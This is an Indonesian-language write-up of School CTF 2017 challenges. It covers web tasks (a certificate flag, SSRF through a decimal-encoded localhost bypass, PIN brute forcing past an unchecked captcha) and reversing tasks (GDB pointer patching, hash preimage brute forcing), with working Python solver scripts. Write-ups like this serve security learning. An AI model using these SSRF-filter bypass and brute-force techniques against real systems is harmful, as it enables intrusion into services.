School CTF 2017 - Write Up

by CTF.Ninja

Website

Web100 (Self Signed)

When they ask me should I trust SchoolCTF or not - the answer is obvious!

Task URL

Situs tersebut menggunakan self signed ssl, dan Flag nya terdapat pada bagian Organizational unit (OU).

curl -v https://secured.task.school-CTF.org/ -k --silent -I

Flag : SchoolCTF{n0t_so+$eCur3}

Web200 (Port Scan)

Pretending to be a simple front-developer Frank The Hacker, 
who is a hacker, wrote his cloud analog nmap and he plans an ICO, 
but it seems there is an error which makes it possible to know one of Frank's secrets.

Can you find it?

Task URL

Web tersebut menyediakan fasilitas scan port. dimana terdapat 2 fitur,

yang pertama ‘Scan the host to get the list of open ports

terlihat port 31337 dengan service SchoolCTF Flag Server dalam keadaan Open.

Yang kedua “Identify the single port on the host

Tetapi apabila me scan “localhost” atau “127.0.0.1” akan mengeluarkan pesan ‘Identifying ports of internal hosts is prohibited ‘.

Possible SSRF ?

Untuk membypass nya bisa dengan merubah ip “127.0.0.1” menjadi Long/Decimal, sehingga bisa menggunakan fitur kedua untuk mendapatkan flag dari port 31337.

Berikut script yang digunakan untuk mendapatkan Flag.

import requests
from socket import inet_aton
from struct import unpack
import re

def ip2long(ip):
    aton = inet_aton(ip)
    return unpack("!L",aton)[0]

def main():
    URL = "http://portscan.task.school-CTF.org/port"
    IP = "127.0.0.1"
    HOST = ip2long(IP)
    PORT = "31337"
    print "Host : {}".format(HOST)
    r = requests.post(URL,data={"host" : HOST,"port" : PORT})
    raw_content = r.content
    flag = re.findall("SchoolCTF{.*?}",raw_content)
    print "Flag : {}".format(flag[0])
if __name__ == '__main__':
    main()

Flag : SchoolCTF{[email protected]^^3@11@r0unD}

Web400 (Pin Code)

We overheard the talk between hacker Frank and his partner William!
It seems they have hidden something important in the safe, can you open it?

p.s. It seems that one of them said that they haven't yet fully configured the security system and the password can be cracked.
Safe URL

Situs tersebut adalah situs “Pin code validation” dimana harus memasukan PIN yang benar untuk mendapatkan Flag.

Dari hasil inspect element didapatkan code berikut

      if (input.length >= 4) {
                var captcha = grecaptcha.getResponse();
                if (captcha.length > 0) {
                    if (isValid(input)) {
                        $.ajax({
                            type: "POST",
                            url: '/api/check',
                            data: {'key': input, 'captcha': captcha},
                            success: function(data){displayAnswer(data)},
                        });
                    } else {
                        displayAnswer({'body': 'wrong'})
                    }
                } else {
                    showError("Please pass the CAPTCHA challenge")
                }

Dari code diatas diketahui bahwa panjang pin harus >= 4, panjang capcha > 0 dan fungsi isValid harus bernilai True agar pin dapat di proses untuk validasi.

Berikut fungsi isValid

        function isValid(code) {
            var d0 = parseInt(code[0]),
                d1 = parseInt(code[1]),
                d2 = parseInt(code[2]),
                d3 = parseInt(code[3]);
            return (d0+d1+d2)%10 == d3
        }

Agar fungsi isValid mereturn True, (pin ke 1 + pin ke 2 + pin ke 3) % 10 harus == pin ke 4

Berikut script yang saya gunakan untuk mendapatkan PIN yang valid.

import requests
from itertools import permutations, product
URL = "http://pincode.task.school-CTF.org/api/check"

def a(pin):
        if (int(pin[0]) + int(pin[1]) + int(pin[2])) % 10 == int(pin[3]):
            return pin
        else:
            return None
pin_list = []
prod_pin = product("123456789",repeat=4)
prod_pin = ["".join(x) for x in list(prod_pin)]
prod_pin = map(a,prod_pin)
prod_pin = filter(None,prod_pin)
prod_pin = list(set(prod_pin))
pin_list+=prod_pin

for pin in pin_list:
    pin = "".join(pin)
    r =requests.post(URL,data={"key" : pin, "captcha" : "SEMBARANGAJA"})
    resp = r.content
    if "wrong" in resp:
        print "Wrong {}".format(pin)
        continue
    else:
        print "Found pin {}".format(pin)
        print "Found pin {}".format(pin)
        print "Found pin {}".format(pin)
        break

setelah dijalankan didapatkan PIN yang valid adalah : 6444

Submit PIN lalu akan mendapatkan Flag. Flag : SchoolCTF{n0_6rut3f0rc3_0n_CTF//mkey?}

Reversing

Rev100 (Incorrect Pointer)

The confrontation history of the evil hacker vs admin Tom has finally come to the end.
After twenty-eight hours of continuous battle, Tom finished a quantum automatic machine, decrypted all the data on the disk, but passed out from the exhaustion.
While Mary was waking Tom up, we started the machine and realized that Tom made an unfortunate mistake there. Help us to fix it!

Task.elf

Diberikan file ELF Binary 64 bit not stripped. Apabila dijalankan akan mengluarkan string aneh

$ ./source_2db04ad72496a13f2cf7afed1b558f5d682257c5                                                                                                                ~/Downloads  0,002s
h�<��<Mx��M��<�x�v<~<
 ��ull!

Lansung saja debug menggunakan GDB. Berikut disassamble fungsi main.

gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x00000000004043cb <+0>: sub    rsp,0x18
   0x00000000004043cf <+4>: mov    DWORD PTR [rsp+0xc],edi
   0x00000000004043d3 <+8>: mov    QWORD PTR [rsp],rsi
   0x00000000004043d7 <+12>:    mov    rsi,rsp
   0x00000000004043da <+15>:    lea    rdi,[rsp+0xc]
   0x00000000004043df <+20>:    call   0x458960 <hs_init>
   0x00000000004043e4 <+25>:    mov    edi,0x7a3090
   0x00000000004043e9 <+30>:    call   0x4589e0 <hs_add_root>
   0x00000000004043ee <+35>:    mov    edi,0x7a31a0
   0x00000000004043f3 <+40>:    call   0x4042c5 <decrypt>
   0x00000000004043f8 <+45>:    mov    edi,0x7a3160
   0x00000000004043fd <+50>:    call   0x4aadd0 <puts>
   0x0000000000404402 <+55>:    call   0x458a00 <hs_exit>
   0x0000000000404407 <+60>:    mov    eax,0x0
   0x000000000040440c <+65>:    add    rsp,0x18
   0x0000000000404410 <+69>:    ret    
End of assembler dump.

Bagian paling menarik adalah intruksi berikut

   0x00000000004043ee <+35>:    mov    edi,0x7a31a0
   0x00000000004043f3 <+40>:    call   0x4042c5 <decrypt>

Dimana nilai yang berada di 0x7a31a0 akan dimove ke edi yang akan menjadi argument pertama untuk fungsi decrypt.

Karena nama soal nya adalah incorrect pointer, tujuan utama nya adalah untuk mengganti argument fungsi decrypt yang awal nya not_flag menjadi flag.Sehingga nilai dari variable “flag” yang di encrypt dapat ter decrypt.

gdb-peda$ x/x 0x7a31a0
0x7a31a0 <not_flag>:    0xef0a5423
gdb-peda$ x/x &flag
0x7a3160 <flag>:    0x3c0dc966
gdb-peda$ b *0x00000000004043f3
Breakpoint 1 at 0x4043f3
gdb-peda$ r
gdb-peda$ set $edi=&flag
gdb-peda$ c
Continuing.
SchoolCTF{[email protected]_M1$T@ke$_As_1_d0}

Flag : SchoolCTF{[email protected][email protected]$_As_1_d0}

Rev300 (Brute me all night long)

Brute me all night long
Mr. Hashenberg is a very forgetful person, so he always uses his notepad to leave some notes. 
Recently he's lost several pages, could you help him to recover?

BruteMe.exe

Diberikan sebuah binary .NET

Berikut hasil decompile menggunakan ILSPY

Fungsi Main

// MD5Sample.SchoolCTF
public static void Main()
{
    Process notepadWindow = SchoolCTF.GetNotepadWindow("Why'd");
    if (notepadWindow != null)
    {
        string text = SchoolCTF.GetText(notepadWindow);
        if (SchoolCTF.GetMd5Hash(text) != "16c222aa19898e5058938167c8ab6c57") 
        {
            SchoolCTF.Fail();
        }
        else
        {
            notepadWindow = SchoolCTF.GetNotepadWindow("Y0u");
            if (notepadWindow != null)
            {
                string text2 = SchoolCTF.GetText(notepadWindow);
                if (SchoolCTF.GetSha384Hash(text2) != "71036b1049de3e6627aa06ef7af933cc460996fdd7ffa9872bf4881e8d10a9c3153c8413ca4cd300a04e81e38d55d327")
                {
                    SchoolCTF.Fail();
                }
                else
                {
                    notepadWindow = SchoolCTF.GetNotepadWindow("0nly");
                    if (notepadWindow != null)
                    {
                        string text3 = SchoolCTF.GetText(notepadWindow);
                        if (SchoolCTF.GetMd5Hash("Ooooh so" + text3 + "salty") != "d0061dcf056a06713d5a757e0288d1b3")
                        {
                            SchoolCTF.Fail();
                        }
                        else
                        {
                            notepadWindow = SchoolCTF.GetNotepadWindow("Ca11");
                            if (notepadWindow != null)
                            {
                                string text4 = SchoolCTF.GetText(notepadWindow);
                                if (SchoolCTF.GetMd5Hash("Stop trying to crack me god damnit!!!" + SchoolCTF.GetSha384Hash(text4)) != "5056e21f6af2a289c9c3116c16bba55f") 
                                {
                                    SchoolCTF.Fail();
                                }
                                else
                                {
                                    notepadWindow = SchoolCTF.GetNotepadWindow("M3");
                                    if (notepadWindow != null)
                                    {
                                        string text5 = SchoolCTF.GetText(notepadWindow);
                                        if (SchoolCTF.GetSha256Hash(text5 + "91") != "8e9b669109df89620b94f2387dc53206a82ddc71d658f8f7a2b3a9b417370d3e")
                                        {
                                            SchoolCTF.Fail();
                                        }
                                        else
                                        {
                                            notepadWindow = SchoolCTF.GetNotepadWindow("Wh3n");
                                            if (notepadWindow != null)
                                            {
                                                string text6 = SchoolCTF.GetText(notepadWindow);
                                                if (SchoolCTF.GetSha512Hash(text6) != "566b014c957c19cb81aab7776eaf614701dadc084aa73fd002301bc7277091c4269ce1223d16746df4e803b85171733b89fa34bb1c61830799dee3611c38e006") 
                                                {
                                                    SchoolCTF.Fail();
                                                }
                                                else
                                                {
                                                    notepadWindow = SchoolCTF.GetNotepadWindow("You'r");
                                                    if (notepadWindow != null)
                                                    {
                                                        string text7 = SchoolCTF.GetText(notepadWindow);
                                                        if (SchoolCTF.GetMd5Hash(SchoolCTF.GetSha384Hash("Oh, i see you reading my source code! >:)") + text7) != "c866a4f386df3da51a54c1f8434603eb")
                                                        {
                                                            SchoolCTF.Fail();
                                                        }
                                                        else
                                                        {
                                                            notepadWindow = SchoolCTF.GetNotepadWindow("H1gh");
                                                            if (notepadWindow != null)
                                                            {
                                                                string text8 = SchoolCTF.GetText(notepadWindow);
                                                                if (SchoolCTF.GetSha256Hash(SchoolCTF.GetSha384Hash(SchoolCTF.GetSha512Hash("FILL THE POWER OF SHA")) + text8) != "7f6e2c5beefd0fd0000c3a72db28b54d0819a93f5cc87a48507f79cdac37cfe0")
                                                                {
                                                                    SchoolCTF.Fail();
                                                                }
                                                                else
                                                                {
                                                                    SchoolCTF.Success(text, text2, text3, text4, text5, text6, text7, text8);
                                                                }
                                                            }
                                                            else
                                                            {
                                                                SchoolCTF.Fail();
                                                            }
                                                        }
                                                    }
                                                    else
                                                    {
                                                        SchoolCTF.Fail();
                                                    }
                                                }
                                            }
                                            else
                                            {
                                                SchoolCTF.Fail();
                                            }
                                        }
                                    }
                                    else
                                    {
                                        SchoolCTF.Fail();
                                    }
                                }
                            }
                            else
                            {
                                SchoolCTF.Fail();
                            }
                        }
                    }
                    else
                    {
                        SchoolCTF.Fail();
                    }
                }
            }
            else
            {
                SchoolCTF.Fail();
            }
        }
    }
    else
    {
        SchoolCTF.Fail();
    }
}

Fungsi success

// MD5Sample.SchoolCTF
public static void Success(string p1, string p2, string p3, string p4, string p5, string p6, string p7, string p8)
{
    StringBuilder stringBuilder = new StringBuilder("Please stop it, noooooo");
    stringBuilder[0] = p8[1];
    stringBuilder[1] = p8[0];
    stringBuilder[2] = p6[1];
    stringBuilder[3] = p6[0];
    stringBuilder[4] = p2[3];
    stringBuilder[5] = p7[1];
    stringBuilder[6] = p1[1];
    stringBuilder[7] = p1[0];
    stringBuilder[8] = p7[0];
    stringBuilder[9] = p2[1];
    stringBuilder[10] = p1[2];
    stringBuilder[11] = p6[2];
    stringBuilder[12] = p2[2];
    stringBuilder[13] = p3[0];
    stringBuilder[14] = 'y';
    stringBuilder[15] = p2[0];
    stringBuilder[16] = p3[1];
    stringBuilder[17] = p3[2];
    stringBuilder[18] = 'r';
    stringBuilder[19] = p4[0];
    stringBuilder[20] = p5[0];
    stringBuilder[21] = 'n';
    stringBuilder[22] = p5[1];
    MessageBox.Show("SchoolCTF{" + stringBuilder.ToString() + "}");
    Console.WriteLine("{0}", stringBuilder);
    Process process = Process.Start(new ProcessStartInfo("notepad.exe")
    {
        WindowStyle = ProcessWindowStyle.Maximized
    });
    process.WaitForInputIdle();
    SchoolCTF.SendText(process, SchoolCTF.succeeded);
}

Tujuan nya adalah untuk memasukan nilai yang benar sehingga semua kondisi pada fungsi Main bernilai True dan akan memanggil fungsi Success.

Berikut script yang digunakan untuk mendapatkan inputan yang benar dan fungsi success di reimplemented lagi agar bisa langsung mengeluarkan Flag.

import itertools
import string
import hashlib

leters = string.ascii_letters + string.punctuation + string.digits

def generator(n=1):
    a = itertools.product(leters,repeat=n)
    return a

def text3():
    for char in generator(3):
        char = "".join(char)
        possible = "Ooooh so{}salty".format(char)
        hashMD5 = hashlib.md5(possible).hexdigest()
        if hashMD5 == "d0061dcf056a06713d5a757e0288d1b3":
            print "Found Text3 {}".format(char)
            return char
        else:
            continue

def text4():
    for char in generator(1):
        char = "".join(char)
        hash384 = hashlib.sha384(char).hexdigest()
        possible = "Stop trying to crack me god damnit!!!{}".format(hash384)
        hashMD5 = hashlib.md5(possible).hexdigest()
        if hashMD5 == "5056e21f6af2a289c9c3116c16bba55f":
            print "Found Text4 {}".format(char)
            return char
        else:
            continue
def text7():
    hash384 = hashlib.sha384("Oh, i see you reading my source code! >:)").hexdigest()
    for char in generator(2):
        char = "".join(char)
        possible = "{0}{1}".format(hash384,char)
        hashMD5 = hashlib.md5(possible).hexdigest()
        if hashMD5 == "c866a4f386df3da51a54c1f8434603eb":
            print "Found Text7 {}".format(char)
            return char
        else:
            continue    
def text8():
    hash384 = hashlib.sha384(hashlib.sha512("FILL THE POWER OF SHA").hexdigest()).hexdigest()
    for char in generator(2):
        char = "".join(char)
        possible = "{0}{1}".format(hash384,char)
        hashMD5 = hashlib.sha256(possible).hexdigest()
        if hashMD5 == "7f6e2c5beefd0fd0000c3a72db28b54d0819a93f5cc87a48507f79cdac37cfe0":
            print "Found Text8 {}".format(char)
            return char
        else:
            continue    
def main():
    # p1,p3,p5, and p6 obtained from :
    # http://hashkiller.co.uk
    # https://md5hashing.net/
    p1 = "541"
    p2 = "____"
    p3 = ""
    p4 = ""
    p5 = "19"
    p6 = "757"
    p7 = ""
    p8 = ""
    p3 += text3()
    p4 += text4()
    p7 += text7()
    p8 += text8()
    print "Flag : SchoolCTF{"+p8[1]+ p8[0]+ p6[1]+ p6[0]+ p2[3]+ p7[1]+ p1[1]+ p1[0]+ p7[0]+ p2[1]+  p1[2]+  p6[2]+  p2[2]+  p3[0]+  'y'+  p2[0]+  p3[1]+  p3[2]+  'r'+  p4[0]+  p5[0]+  'n'+  p5[1]+"}"
if __name__ == '__main__':
    main()

Flag : SchoolCTF{Ju57_h45h_17_my_d4rl1n9}

Tags: SchoolCTF2017CTF

Subscribe via RSS